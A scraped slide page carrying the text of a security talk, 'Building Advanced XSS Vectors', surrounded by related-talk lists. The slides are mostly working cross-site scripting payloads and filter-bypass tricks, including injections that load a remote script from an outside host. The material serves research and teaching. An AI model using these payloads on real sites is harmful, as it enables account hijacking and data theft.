New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
JavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeJavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrime
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKPengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDK
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
{{more}} Kibana4
{{more}} Kibana4{{more}} Kibana4
{{more}} Kibana4
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)
 
Apache安装配置mod security
Apache安装配置mod securityApache安装配置mod security
Apache安装配置mod security
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 

Similar to Building Advanced XSS Vectors

the next web now
the next web nowthe next web now
the next web nowzulin Gu
 
Modern frontend development with VueJs
Modern frontend development with VueJsModern frontend development with VueJs
Modern frontend development with VueJsTudor Barbu
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsOWASP Kyiv
 
Hands-On XML Attacks
Hands-On XML AttacksHands-On XML Attacks
Hands-On XML AttacksToe Khaing
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup PerformanceJustin Cataldo
 
Private slideshow
Private slideshowPrivate slideshow
Private slideshowsblackman
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Positive Hack Days
 
Building High Performance Web Applications and Sites
Building High Performance Web Applications and SitesBuilding High Performance Web Applications and Sites
Building High Performance Web Applications and Sitesgoodfriday
 
BITM3730 10-3.pptx
BITM3730 10-3.pptxBITM3730 10-3.pptx
BITM3730 10-3.pptxMattMarino13
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeAndrea Cardinale
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack
 

Similar to Building Advanced XSS Vectors (20)

Performance patterns
Performance patternsPerformance patterns
Performance patterns
 
UNIT 1 (7).pptx
UNIT 1 (7).pptxUNIT 1 (7).pptx
UNIT 1 (7).pptx
 
the next web now
the next web nowthe next web now
the next web now
 
Modern frontend development with VueJs
Modern frontend development with VueJsModern frontend development with VueJs
Modern frontend development with VueJs
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tips
 
Hands-On XML Attacks
Hands-On XML AttacksHands-On XML Attacks
Hands-On XML Attacks
 
前端概述
前端概述前端概述
前端概述
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
Private slideshow
Private slideshowPrivate slideshow
Private slideshow
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
 
Jquery Basics
Jquery BasicsJquery Basics
Jquery Basics
 
Jquery fundamentals
Jquery fundamentalsJquery fundamentals
Jquery fundamentals
 
Java script
Java scriptJava script
Java script
 
Building High Performance Web Applications and Sites
Building High Performance Web Applications and SitesBuilding High Performance Web Applications and Sites
Building High Performance Web Applications and Sites
 
BITM3730 10-3.pptx
BITM3730 10-3.pptxBITM3730 10-3.pptx
BITM3730 10-3.pptx
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
 
Dart Workshop
Dart WorkshopDart Workshop
Dart Workshop
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
 
Lumberjack XPath 101
Lumberjack XPath 101Lumberjack XPath 101
Lumberjack XPath 101
 

Recently uploaded

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Recently uploaded (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 

Building Advanced XSS Vectors

  • 3. About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
  • 4. About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
  • 5. About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
  • 7. Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
  • 8. Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
  • 10. Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
  • 11.
  • 12.
  • 14. Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
  • 15. Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
  • 16. Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
  • 18. Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
  • 19. Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
  • 20. Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
  • 21. Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
  • 23. Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
  • 24. Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
  • 25. Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
  • 27. Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
  • 28. Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 29. Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 30. Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 31. Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 32. Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 33. Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 34. Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 35. Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 36. Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 37. Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 38. Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 39. Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 40. Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
  • 41. Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
  • 42. Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
  • 43. Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
  • 44. Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
  • 45. Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
  • 46. Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
  • 47. Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
  • 48. Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
  • 49. Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
  • 50. Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
  • 51. Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
  • 52. Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
  • 53. Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
  • 54. Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
  • 55. Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
  • 57. Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
  • 58. Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
  • 59. Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
  • 60. Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.